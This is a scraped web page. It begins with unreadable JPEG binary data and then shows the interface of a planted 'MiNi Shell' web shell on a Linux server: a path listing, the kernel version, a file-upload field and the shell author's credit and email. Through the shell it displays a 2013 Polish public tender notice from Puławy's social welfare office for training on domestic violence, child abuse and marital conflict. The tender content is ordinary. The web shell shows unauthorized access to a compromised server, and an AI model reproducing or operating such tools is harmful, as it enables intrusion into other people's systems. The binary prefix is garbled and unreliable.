JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131001/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131001/396826-N-2013.html

<p class="kh_header"><b>Puławy: NOF.3410/2/2013
ZORGANIZOWANIE  I  PRZEPROWADZENIE  SZKOLEŃ  WG  CZĘŚCI
Część I  Grupy robocze w praktyce 
Część II  Przemoc wobec dzieci -identyfikacja, czynniki ryzyka, przeciwdziałanie
Część III Praca z rodziną w sytuacjach konfliktu małżeńskiego</b><br>
<b>Numer ogłoszenia: 396826 - 2013; data zamieszczenia: 01.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Leśna 17, 24-100 Puławy, woj. lubelskie, tel. 081 8868419, faks 081 8868420.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops_pul@lu.onet.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NOF.3410/2/2013
ZORGANIZOWANIE  I  PRZEPROWADZENIE  SZKOLEŃ  WG  CZĘŚCI
Część I  Grupy robocze w praktyce 
Część II  Przemoc wobec dzieci -identyfikacja, czynniki ryzyka, przeciwdziałanie
Część III Praca z rodziną w sytuacjach konfliktu małżeńskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I    Grupy robocze w praktyce
Czas trwania szkolenia:  9 godzin dydaktycznych  -1 dzień roboczy  9 godz.  dydaktycznych tj. 9 x 45min.
Czas zajęć: 7.45 - 15.30 w tym 3 przerwy kawowe tj. 2 przerwy po 15 min. i 1 przerwa 30 min.
Liczba grup: 1 grupa 20 osobowa
Miejsce realizacji szkolenia: Miejski Ośrodek Pomocy Społecznej w Puławach, ul. Leśna 17
Termin szkolenia:  od dnia 28 października 2013r. do dnia 15 listopada 2013r.
Liczba osób prowadzących szkolenie: 1 osoba
Uczestnicy szkolenia: przedstawiciele różnych służb lokalnych działających na rzecz przeciwdziałania przemocy w rodzinie w zakresie znowelizowanej ustawy o przeciwdziałaniu przemocy w rodzinie i procedury -Niebieskie Karty.
Część II
Przemoc wobec dzieci - identyfikacja, czynniki ryzyka, przeciwdziałanie
Czas trwania szkolenia: 36 godzin dydaktycznych - dla  jednej grupy -  2 kolejne dni  robocze, każdy po 9 godz. dydaktycznych  tj.  9 x 45min = 18godz. dydakt.
Czas zajęć: 7.45 - 15.30 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa - 30 min.
Liczba grup: 2 grupy po 20 osób
Miejsce szkolenia: Miejski Ośrodek Pomocy Społecznej w Puławach, ul. Leśna 17
Termin szkolenia: od dnia 28 października 2013r. do dnia 15 listopada 2013r.
Liczba osób prowadzących szkolenie: 1 osoba
Uczestnicy szkolenia: przedstawiciele różnych służb lokalnych działających na rzecz przeciwdziałania przemocy w rodzinie, szczególnie w obszarze pomocy dzieciom krzywdzonym
Część III
Praca z rodziną w sytuacjach konfliktu małżeńskiego
Czas trwania szkolenia: 16 godzin dydaktycznych -2 dni robocze, każdy po 8 godzin tj. 8x45min.
Czas zajęć: 7.45 - 14.45 - 3 przerwy kawowe tj. 2 przerwy kawowe po 15 min., 1 przerwa 30 min.
Liczba grup: 1 grupa 25 osób
Miejsce szkolenia: Miejski Ośrodek Pomocy Społecznej w Puławach, ul. Leśna 17
Termin szkolenia: od dnia 28 października 2013r. do dnia  30 listopada  2013r.
Liczba osób prowadzących szkolenie: 1 osoba
Uczestnicy szkolenia: pracownicy socjalni Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły -spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia, jeżeli ten wykaże, że posiada doświadczenie w realizacji szkoleń o tej samej tematyce:
dla wszystkich części  przetargu:
Wykonawca będzie posiadać doświadczenie w realizacji minimum trzech szkoleń, w zakresie tematycznie związanym z przedmiotem zamówienia  w okresie ostatnich trzech lat przed terminem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy, w tym okresie- Załącznik nr l do oferty
- W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia:
dla części I przetargu:
Wykładowca/trener  który posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj. osoba posiadająca wykształcenie wyższe kierunkowe psychologiczne i uprawnienia trenera umiejętności  miękkich - certyfikat, zaświadczenie lub dyplom ukończenia kursu, szkoły lub studiów podyplomowych -  Zamawiający wymaga przedłożenia wymienionych dokumentów przed podpisaniem umowy, oraz doświadczenie w przeprowadzeniu minimum 50 godzin dydaktycznych szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy w rodzinie w okresie ostatnich 3 lat przed upływem terminu składania ofert.
W przypadku zmiany wykładowcy/trenera wykonawca zobowiązany jest zapewnić osobę  z wykształceniem i doświadczeniem co najmniej takim jak  osoba zgłoszona w ofercie.
Informacje  o wykształceniu, uprawnieniach oraz doświadczeniu wykładowcy/trenera  mają być zawarte w Załączniku nr 3 do oferty.
dla części II przetargu:
Wykładowca/trener, który posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj. osobę posiadającą wykształcenie wyższe magisterskie kierunkowe psychologiczne i uprawnienia trenera - certyfikat, zaświadczenie lub dyplom ukończenia kursu, szkoły lub studiów podyplomowych - Zamawiający wymaga przedłożenia wymienionych dokumentów przed podpisaniem umowy- i posiadającą doświadczenie w przeprowadzeniu  50 godzin dydaktycznych szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy w rodzinie w okresie ostatnich 3 lat przed upływem terminu składania ofert.
W przypadku zmiany wykładowcy/trenera wykonawca zobowiązany jest zapewnić osobę  z wykształceniem i doświadczeniem co najmniej takim jak   osoba zgłoszona w ofercie.
Informacje  o wykształceniu, uprawnieniach oraz doświadczeniu wykładowcy/trenera  mają być zawarte w Załączniku nr 3 do oferty.
dla części III przetargu:
Kadrę, który posiada odpowiednie kwalifikacje zawodowe, doświadczenie 
i wykształcenie niezbędne do wykonania zamówienia tj. osobę posiadającą wykształcenie wyższe kierunkowe - psycholog lub resocjalizator i uprawnienia  trenera umiejętności  miękkich -certyfikat, zaświadczenie lub dyplom ukończenia kursu, szkoły lub studiów podyplomowych - Zamawiający wymaga przedłożenia wymienionych dokumentów przed podpisaniem umowy- oraz doświadczenie - co najmniej trzyletnia praktyka w pracy z rodziną w kryzysie w okresie ostatnich 3 lat przed upływem terminu składania ofert. 
W przypadku zmiany wykładowcy/trenera wykonawca zobowiązany jest zapewnić osobę  z wykształceniem i doświadczeniem co najmniej takim jak   osoba zgłoszona w ofercie.
Informacje  o wykształceniu, uprawnieniach oraz doświadczeniu wykładowcy/trenera  mają być zawarte w Załączniku nr 3 do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej, jeżeli ten oświadczy, że znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej -Załącznik nr 4 do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Oświadczenie - załącznik nr 4 do oferty;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie Wykonawcy potwierdzające jego wiedzę i doświadczenie  - zał.nr 1
-Wykaz osób zdolnych do wykonania zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenie niezbędnych do wykonania zamówienia oraz informacja o podstawie do dysponowania tymi osobami - zał. nr 2
-Oświadczenie Wykonawcy - doświadczenie wykładowcy/trenera - zał. nr 3
- Oświadczenie Wykonawcy dot: art. 22 - zał. nr 5
- Oświadczenie Wykonawcy o braku podstaw do wykluczenia - zał. nr 6
- Oświadczenie Wykonawcy -Urząd Skarbowy, ZUS lub KRUS - zał. nr 7
- Szczegółowy program szkolenia - zał. 8</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać od poniedziałku do piątku w godz. 07:30 - 15:00 w 
Miejski Ośrodek Pomocy Społecznej ul Leśna 17 , 24-100 Puławy pok. nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2013 godzina 07:30, miejsce: Sekretariat  Miejskiego Ośrodka Pomocy Społecznej ul. Leśna 17 
24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I  Grupy robocze w praktyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rola i zadania grup roboczych -z uwzględnieniem zadań dla przedstawicieli poszczególnych służb i instytucji.
2.Prowadzenie procedury Niebieskie Karty  w ramach pracy grupy roboczej.
3.Tworzenie strategii postępowania w konkretnych przypadkach. 
4.Dokumentowanie działań podejmowanych wobec rodzin, w których dochodzi do przemocy oraz efektów tych działań.
Metody i techniki , jakie wykonawca zobowiązany jest zastosować podczas szkolenia:
1. Wykłady - werbalna prezentacja tematu przez prowadzącego przy wykorzystaniu rzutnika LCD oraz rozbudowanego materiału informacyjnego przekazanego uczestnikom; 
2. Warsztaty - uczestnicy będą mogli zadawać pytania, które budzą ich zainteresowanie, zaś wykładowca jest zobowiązany do udzielenia odpowiedzi na nie.
3. Odpowiedź na pytania - w przypadku skomplikowanych merytorycznie pytań zadanych przez uczestnika szkolenia, wykładowca ma obowiązek udzielenia odpowiedzi w dogodnej dla słuchaczy formie w terminie do 14 dni od daty zakończenia szkolenia; 
4. Studium przypadku - analiza w zakresie praktycznym - problemów, sytuacji, przykładów wskazanych przez uczestników szkolenia. 
5. Dobre praktyki - prezentacja dobrych praktyk w kontekście procedury Niebieskie Karty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II  Przemoc wobec dzieci -identyfikacja, czynniki ryzyka, przeciwdziałanie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Diagnoza sytuacji dziecka doświadczającego przemocy w rodzinie.
2. Dziecko krzywdzone w rodzinie.
3.Dziecko jako świadek przemocy.
4. Pomoc psychologiczno-pedagogiczna dziecku krzywdzonemu.
5. Dziecko w procedurze -Niebieskie Karty.
6. Rola przedstawicieli służb i  instytucji w procesie pomocy dziecku krzywdzonemu
Metody i techniki , jakie wykonawca zobowiązany jest zastosować podczas szkolenia:
1. Wykłady - werbalna prezentacja tematu przez prowadzącego przy wykorzystaniu rzutnika LCD oraz rozbudowanego materiału informacyjnego przekazanego uczestnikom; 
2. Warsztaty - uczestnicy będą mogli zadawać własne pytania, zaś wykładowca jest zobowiązany do udzielenia odpowiedzi na nie.
3. Odpowiedź na pytania - w przypadku skomplikowanych merytorycznie pytań zadanych przez uczestnika szkolenia, wykładowca ma obowiązek udzielenia odpowiedzi w dogodnej dla słuchaczy formie w terminie do 14 dni od daty zakończenia szkolenia; 
4. Studium przypadku - analiza w zakresie praktycznym - problemów, sytuacji, przykładów wskazanych przez uczestników szkolenia. 
5. Dobre praktyki - prezentacja dobrych praktyk w kontekście procedury Niebieskie Karty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III Praca z rodziną w sytuacjach konfliktu małżeńskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny szkolenia: 

1.Przyczyny trudności - zdrada, konflikty rodzicielskie, rozczarowanie związkiem, zazdrość, obwinianie, gniew, agresja, nadużywanie alkoholu.
2.Pomoc w rozpoznawaniu i korygowaniu sposobów myślenia utrudniających wzajemne kontakty -  jak to zmienić?.
3.Formy komunikowania między małżonkami utrudniające wzajemne kontakty, wzory konstruktywnej komunikacji
4.Zachowania utrudniające kontakty między małżonkami, sposoby zachowań wspierających komunikację.
5.Rozwijanie umiejętności rozwiązywania wspólnych problemów i konfliktów
6.Role pracownika socjalnego w pracy z rodziną w sytuacji konfliktu małżeńskiego- warsztat
Metody i techniki , jakie wykonawca zobowiązany jest zastosować podczas szkolenia:

1. Wykłady - werbalna prezentacja tematu przez prowadzącego przy wykorzystaniu rzutnika LCD oraz rozbudowanego materiału informacyjnego przekazanego uczestnikom; 
2. Warsztaty - uczestnicy będą mogli zadawać własne pytania, zaś wykładowca jest zobowiązany do udzielenia odpowiedzi na nie. 
3. Studium przypadku - analiza w zakresie praktycznym - problemów, sytuacji, przykładów wskazanych przez uczestników szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com